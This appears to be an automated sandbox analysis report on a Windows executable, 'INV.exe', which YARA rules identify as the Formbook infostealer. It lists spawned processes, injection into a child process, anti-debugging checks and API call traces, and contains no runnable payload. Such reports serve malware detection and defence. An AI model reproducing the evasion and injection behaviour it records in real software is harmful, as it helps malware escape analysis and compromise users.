Source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal80.troj.evad.winEXE@5/4@0/0

Source: C:\Users\user\Desktop\INV.exe

Code function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,

2_2_00401489

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6640

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER54C8.tmp

Jump to behavior

Source: INV.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\INV.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\INV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: INV.exe

Virustotal: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\INV.exe 'C:\Users\user\Desktop\INV.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 872
Source: C:\Users\user\Desktop\INV.exe	Process created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe	Jump to behavior

Source: C:\Users\user\Desktop\INV.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: INV.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wintrust.pdbJ source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.650985591.00000000046CD000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdbx source: WerFault.exe, 00000005.00000003.653962430.0000000004CA0000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: INV.exe, 00000000.00000003.644532557.0000000002410000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
Source:	Binary string: .ni.pdb source: WerFault.exe, 00000005.00000003.654329781.00000000049C2000.00000004.00000001.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.654358886.0000000004B90000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.654358886.0000000004B90000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.654358886.0000000004B90000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp, WER54C8.tmp.dmp.5.dr
Source:	Binary string: mscoree.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.654358886.0000000004B90000.00000004.00000040.sdmp
Source:	Binary string: WLDP.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: INV.exe, 00000000.00000003.644532557.0000000002410000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER54C8.tmp.dmp.5.dr
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000005.00000003.653962430.0000000004CA0000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.654358886.0000000004B90000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: WerFault.exe, 00000005.00000003.653962430.0000000004CA0000.00000004.00000001.sdmp, WER54C8.tmp.dmp.5.dr
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.654324403.00000000049B1000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.654362368.0000000004B94000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdbk source: WerFault.exe, 00000005.00000003.654362368.0000000004B94000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000005.00000003.654340383.0000000004B91000.00000004.00000040.sdmp
Source:	Binary string: .pdbEE source: WerFault.exe, 00000005.00000003.654329781.00000000049C2000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.654365444.0000000004B97000.00000004.00000040.sdmp

Source: INV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: INV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: INV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: INV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: INV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000B21EE push ecx; ret	0_2_000B2201
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000DF402 push eax; ret	0_2_000DF408
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000DF46C push eax; ret	0_2_000DF472
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000D05B2 pushfd ; retf	0_2_000D05ED
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_00092835 push ecx; ret	0_2_00092848
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000D8864 push edx; retf	0_2_000D8884
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000C9A9E push ss; ret	0_2_000C9AEC
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000C9B83 push es; ret	0_2_000C9B93
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000C6C15 push eax; iretd	0_2_000C6C16
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000D8C60 push ds; retf	0_2_000D8C61
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000AEDC0 push eax; ret	0_2_000AEE21
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000AEE70 push eax; ret	0_2_000AEE21
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000D8F2B push ecx; ret	0_2_000D8F33
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000D8F24 push ecx; ret	0_2_000D8F33
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_00092835 push ecx; ret	2_2_00092848
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_00401F16 push ecx; ret	2_2_00401F29

Source: C:\Users\user\Desktop\INV.exe

Code function: 0_2_00091BC7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00091BC7

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket

Jump to behavior

Source: C:\Users\user\Desktop\INV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\INV.exe

Code function: 0_2_000CBC10 rdtsc

0_2_000CBC10

Source: C:\Windows\SysWOW64\WerFault.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\INV.exe

Code function: 2_2_00404A29 FindFirstFileExW,

2_2_00404A29

Source: INV.exe, 00000002.00000002.668934607.0000000004DC0000.00000002.00000001.sdmp, WerFault.exe, 00000005.00000002.665648403.0000000004BB0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000005.00000002.664993671.0000000004633000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: INV.exe, 00000002.00000002.668934607.0000000004DC0000.00000002.00000001.sdmp, WerFault.exe, 00000005.00000002.665648403.0000000004BB0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: INV.exe, 00000002.00000002.668934607.0000000004DC0000.00000002.00000001.sdmp, WerFault.exe, 00000005.00000002.665648403.0000000004BB0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000005.00000002.664975958.0000000004620000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`\|c
Source: INV.exe, 00000002.00000002.668934607.0000000004DC0000.00000002.00000001.sdmp, WerFault.exe, 00000005.00000002.665648403.0000000004BB0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\WerFault.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\INV.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\INV.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\INV.exe

Code function: 0_2_000CBC10 rdtsc

0_2_000CBC10

Source: C:\Users\user\Desktop\INV.exe

Code function: 0_2_000983A4 IsDebuggerPresent,

0_2_000983A4

Source: C:\Users\user\Desktop\INV.exe

Code function: 0_2_000956BA EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_000956BA

Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000A7800 mov eax, dword ptr fs:[00000030h]	0_2_000A7800
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000A7800 mov eax, dword ptr fs:[00000030h]	0_2_000A7800
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000B02BD mov eax, dword ptr fs:[00000030h]	0_2_000B02BD
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000B38C9 mov eax, dword ptr fs:[00000030h]	0_2_000B38C9
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000A7A20 mov eax, dword ptr fs:[00000030h]	0_2_000A7A20
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000B0C83 mov eax, dword ptr fs:[00000030h]	0_2_000B0C83
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000B0CC0 mov eax, dword ptr fs:[00000030h]	0_2_000B0CC0
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000B0D23 mov eax, dword ptr fs:[00000030h]	0_2_000B0D23
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000A7800 mov eax, dword ptr fs:[00000030h]	2_2_000A7800
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000A7800 mov eax, dword ptr fs:[00000030h]	2_2_000A7800
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000A7A20 mov eax, dword ptr fs:[00000030h]	2_2_000A7A20
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]	2_2_004035F1

Source: C:\Users\user\Desktop\INV.exe

Code function: 0_2_00091DB2 GetProcessHeap,

0_2_00091DB2

Source: C:\Windows\SysWOW64\WerFault.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000930B6 SetUnhandledExceptionFilter,	0_2_000930B6
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000930E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000930E7
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000930B6 SetUnhandledExceptionFilter,	2_2_000930B6
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000930E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000930E7
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_00401E1D SetUnhandledExceptionFilter,	2_2_00401E1D
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0040446F
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00401C88
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00401F30

Source: C:\Users\user\Desktop\INV.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\INV.exe

Section loaded: unknown target: C:\Users\user\Desktop\INV.exe protection: execute and read and write

Jump to behavior

Source: C:\Users\user\Desktop\INV.exe

Process created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe

Jump to behavior

Source: C:\Users\user\Desktop\INV.exe

Code function: 0_2_000B2365 cpuid

0_2_000B2365

Source: C:\Users\user\Desktop\INV.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	0_2_000960C8
Source: C:\Users\user\Desktop\INV.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	0_2_0009E15F
Source: C:\Users\user\Desktop\INV.exe	Code function: EnumSystemLocalesW,	0_2_0009E3D3
Source: C:\Users\user\Desktop\INV.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_0009E42F
Source: C:\Users\user\Desktop\INV.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_0009E4AC
Source: C:\Users\user\Desktop\INV.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	0_2_0009E52F
Source: C:\Users\user\Desktop\INV.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_0009755A
Source: C:\Users\user\Desktop\INV.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	0_2_0009458E
Source: C:\Users\user\Desktop\INV.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_000966CA
Source: C:\Users\user\Desktop\INV.exe	Code function: EnumSystemLocalesW,	0_2_0009771D
Source: C:\Users\user\Desktop\INV.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	0_2_0009E724
Source: C:\Users\user\Desktop\INV.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_0009A73D
Source: C:\Users\user\Desktop\INV.exe	Code function: GetLocaleInfoW,	0_2_000977A3
Source: C:\Users\user\Desktop\INV.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0009E84E
Source: C:\Users\user\Desktop\INV.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	0_2_0009E8FB
Source: C:\Users\user\Desktop\INV.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	0_2_0009E9CF
Source: C:\Users\user\Desktop\INV.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	0_2_00095C88
Source: C:\Users\user\Desktop\INV.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_0009E42F
Source: C:\Users\user\Desktop\INV.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0009E84E
Source: C:\Users\user\Desktop\INV.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	2_2_00095C88
Source: C:\Users\user\Desktop\INV.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_0009E4AC
Source: C:\Users\user\Desktop\INV.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	2_2_000960C8
Source: C:\Users\user\Desktop\INV.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	2_2_0009E8FB
Source: C:\Users\user\Desktop\INV.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	2_2_0009E52F
Source: C:\Users\user\Desktop\INV.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_0009755A
Source: C:\Users\user\Desktop\INV.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	2_2_0009E15F
Source: C:\Users\user\Desktop\INV.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	2_2_0009458E
